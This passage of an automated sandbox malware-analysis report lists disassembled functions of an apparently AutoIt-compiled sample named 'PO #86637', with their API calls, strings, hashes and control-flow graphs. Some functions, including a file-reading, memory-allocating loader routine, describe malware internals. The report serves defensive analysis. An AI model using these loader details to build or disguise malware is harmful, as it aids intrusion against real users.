                      • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                      • TranslateMessage.USER32(?), ref: 00409556
                      • DispatchMessageW.USER32(?), ref: 00409561
                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Message$Peek$DispatchSleepTranslate
                      • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                      • API String ID: 1762048999-758534266
                      • Opcode ID: 65ef02fb38a27282c9e7cf101ebea7aa72ed4640524a943440740a68ee139f81
                      • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                      • Opcode Fuzzy Hash: 65ef02fb38a27282c9e7cf101ebea7aa72ed4640524a943440740a68ee139f81
                      • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A
                      Function 00401F20 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 214COMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                      • __wcsicoll.LIBCMT ref: 00402007
                      • __wcsicoll.LIBCMT ref: 0040201D
                      • __wcsicoll.LIBCMT ref: 00402033
                        • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                      • __wcsicoll.LIBCMT ref: 00402049
                      • _wcscpy.LIBCMT ref: 0040207C
                      • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104), ref: 00428B5B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                      • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CMDLINE$CMDLINERAW
                      • API String ID: 3948761352-1609664196
                      • Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                      • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                      • Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                      • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99
                      Function 0040E360 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151COMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                      • __wsplitpath.LIBCMT ref: 0040E41C
                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                      • _wcsncat.LIBCMT ref: 0040E433
                      • __wmakepath.LIBCMT ref: 0040E44F
                        • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                      • _wcscpy.LIBCMT ref: 0040E487
                        • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                      • _wcscat.LIBCMT ref: 00427541
                      • _wcslen.LIBCMT ref: 00427551
                      • _wcslen.LIBCMT ref: 00427562
                      • _wcscat.LIBCMT ref: 0042757C
                      • _wcsncpy.LIBCMT ref: 004275BC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                      • String ID: Include$\
                      • API String ID: 3173733714-3429789819
                      • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                      • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                      • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                      • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E
                      Function 004528BD Relevance: 19.7, APIs: 13, Instructions: 173COMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • _fseek.LIBCMT ref: 0045292B
                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                        • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                        • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                      • __fread_nolock.LIBCMT ref: 00452961
                      • __fread_nolock.LIBCMT ref: 00452971
                      • __fread_nolock.LIBCMT ref: 0045298A
                      • __fread_nolock.LIBCMT ref: 004529A5
                      • _fseek.LIBCMT ref: 004529BF
                      • _malloc.LIBCMT ref: 004529CA
                      • _malloc.LIBCMT ref: 004529D6
                      • __fread_nolock.LIBCMT ref: 004529E7
                      • _free.LIBCMT ref: 00452A17
                      • _free.LIBCMT ref: 00452A20
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                      • String ID:
                      • API String ID: 1255752989-0
                      • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                      • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                      • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                      • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59
                      Function 00452719 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 147COMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: __fread_nolock$_fseek_wcscpy
                      • String ID: FILE
                      • API String ID: 3888824918-3121273764
                      • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                      • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                      • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                      • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5
                      Function 00410490 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 56windowregistryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                      • RegisterClassExW.USER32(00000030), ref: 004104ED
                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                      • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                      • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                      • ImageList_ReplaceIcon.COMCTL32(009D0880,000000FF,00000000), ref: 00410552
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                      • API String ID: 2914291525-1005189915
                      • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                      • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                      • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                      • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99
                      Function 00410390 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 76windowregistryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                      • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                      • LoadIconW.USER32(?,00000063), ref: 004103C0
                      • LoadIconW.USER32(?,000000A4), ref: 004103D3
                      • LoadIconW.USER32(?,000000A2), ref: 004103E6
                      • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                      • RegisterClassExW.USER32(?), ref: 0041045D
                        • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                        • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                        • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                        • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                        • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                        • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                        • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(009D0880,000000FF,00000000), ref: 00410552
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                      • String ID: #$0$AutoIt v3
                      • API String ID: 423443420-4155596026
                      • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                      • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                      • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                      • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                      Function 0040A780 Relevance: 16.6, APIs: 8, Strings: 1, Instructions: 881COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _malloc
                      • String ID: Default
                      • API String ID: 1579825452-753088835
                      • Opcode ID: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                      • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                      • Opcode Fuzzy Hash: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                      • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B
                      Function 0040F5C0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 125COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1054 40f5c0-40f5cf call 422240 1057 40f5d0-40f5e8 1054->1057 1057->1057 1058 40f5ea-40f613 call 413650 call 410e60 1057->1058 1063 40f614-40f633 call 414d04 1058->1063 1066 40f691 1063->1066 1067 40f635-40f63c 1063->1067 1068 40f696-40f69c 1066->1068 1069 40f660-40f674 call 4150d1 1067->1069 1070 40f63e 1067->1070 1074 40f679-40f67c 1069->1074 1071 40f640 1070->1071 1073 40f642-40f650 1071->1073 1075 40f652-40f655 1073->1075 1076 40f67e-40f68c 1073->1076 1074->1063 1079 40f65b-40f65e 1075->1079 1080 425d1e-425d3e call 4150d1 call 414d04 1075->1080 1077 40f68e-40f68f 1076->1077 1078 40f69f-40f6ad 1076->1078 1077->1075 1081 40f6b4-40f6c2 1078->1081 1082 40f6af-40f6b2 1078->1082 1079->1069 1079->1071 1090 425d43-425d5f call 414d30 1080->1090 1085 425d16 1081->1085 1086 40f6c8-40f6d6 1081->1086 1082->1075 1085->1080 1088 425d05-425d0b 1086->1088 1089 40f6dc-40f6df 1086->1089 1088->1073 1091 425d11 1088->1091 1089->1075 1090->1068 1091->1085
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: __fread_nolock_fseek_memmove_strcat
                      • String ID: AU3!$EA06
                      • API String ID: 1268643489-2658333250
                      • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                      • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                      • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                      • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754
                      Function 00401100 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136windowtimeregistryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1094 401100-401111 1095 401113-401119 1094->1095 1096 401179-401180 1094->1096 1098 401144-40114a 1095->1098 1099 40111b-40111e 1095->1099 1096->1095 1097 401182 1096->1097 1100 40112c-401141 DefWindowProcW 1097->1100 1102 401184-40118e call 401250 1098->1102 1103 40114c-40114f 1098->1103 1099->1098 1101 401120-401126 1099->1101 1101->1100 1107 42b038-42b03f 1101->1107 1111 401193-40119a 1102->1111 1104 401151-401157 1103->1104 1105 40119d 1103->1105 1108 401219-40121f 1104->1108 1109 40115d 1104->1109 1112 4011a3-4011a9 1105->1112 1113 42afb4-42afc5 call 40f190 1105->1113 1107->1100 1110 42b045-42b059 call 401000 call 40e0c0 1107->1110 1108->1101 1116 401225-42b06d call 468b0e 1108->1116 1114 401163-401166 1109->1114 1115 42b01d-42b024 1109->1115 1110->1100 1112->1101 1119 4011af 1112->1119 1113->1111 1121 42afe9-42b018 call 40f190 call 401a50 1114->1121 1122 40116c-401172 1114->1122 1115->1100 1120 42b02a-42b033 call 4370f4 1115->1120 1116->1111 1119->1101 1126 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 1119->1126 1127 4011db-401202 SetTimer RegisterWindowMessageW 1119->1127 1120->1100 1121->1100 1122->1101 1130 401174-42afde call 45fd57 1122->1130 1127->1111 1128 401204-401216 CreatePopupMenu 1127->1128 1130->1100 1145 42afe4 1130->1145 1145->1111
                      APIs
                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                      • KillTimer.USER32(?,00000001,?), ref: 004011B9
                      • PostQuitMessage.USER32(00000000), ref: 004011CB
                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                      • CreatePopupMenu.USER32 ref: 00401204
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                      • String ID: TaskbarCreated
                      • API String ID: 129472671-2362178303
                      • Opcode ID: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                      • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                      • Opcode Fuzzy Hash: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                      • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E
                      Function 004115D7 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1146 4115d7-4115df 1147 4115ee-4115f9 call 4135bb 1146->1147 1150 4115e1-4115ec call 411988 1147->1150 1151 4115fb-4115fc 1147->1151 1150->1147 1154 4115fd-41160e 1150->1154 1155 411610-41163b call 417fc0 call 41130a 1154->1155 1156 41163c-411656 call 4180af call 418105 1154->1156 1155->1156
                      APIs
                      • _malloc.LIBCMT ref: 004115F1
                        • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                        • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                        • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                      • std::exception::exception.LIBCMT ref: 00411626
                      • std::exception::exception.LIBCMT ref: 00411640
                      • __CxxThrowException@8.LIBCMT ref: 00411651
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                      • String ID: ,*H$4*H$@fI
                      • API String ID: 615853336-1459471987
                      • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                      • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                      • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                      • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D
                      Function 040D1648 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1165 40d1648-40d16f6 call 40cf058 1168 40d16fd-40d1723 call 40d2558 CreateFileW 1165->1168 1171 40d172a-40d173a 1168->1171 1172 40d1725 1168->1172 1177 40d173c 1171->1177 1178 40d1741-40d175b VirtualAlloc 1171->1178 1173 40d1875-40d1879 1172->1173 1174 40d18bb-40d18be 1173->1174 1175 40d187b-40d187f 1173->1175 1179 40d18c1-40d18c8 1174->1179 1180 40d188b-40d188f 1175->1180 1181 40d1881-40d1884 1175->1181 1177->1173 1182 40d175d 1178->1182 1183 40d1762-40d1779 ReadFile 1178->1183 1184 40d191d-40d1932 1179->1184 1185 40d18ca-40d18d5 1179->1185 1186 40d189f-40d18a3 1180->1186 1187 40d1891-40d189b 1180->1187 1181->1180 1182->1173 1190 40d177b 1183->1190 1191 40d1780-40d17c0 VirtualAlloc 1183->1191 1194 40d1934-40d193f VirtualFree 1184->1194 1195 40d1942-40d194a 1184->1195 1192 40d18d9-40d18e5 1185->1192 1193 40d18d7 1185->1193 1188 40d18a5-40d18af 1186->1188 1189 40d18b3 1186->1189 1187->1186 1188->1189 1189->1174 1190->1173 1196 40d17c7-40d17e2 call 40d27a8 1191->1196 1197 40d17c2 1191->1197 1198 40d18f9-40d1905 1192->1198 1199 40d18e7-40d18f7 1192->1199 1193->1184 1194->1195 1205 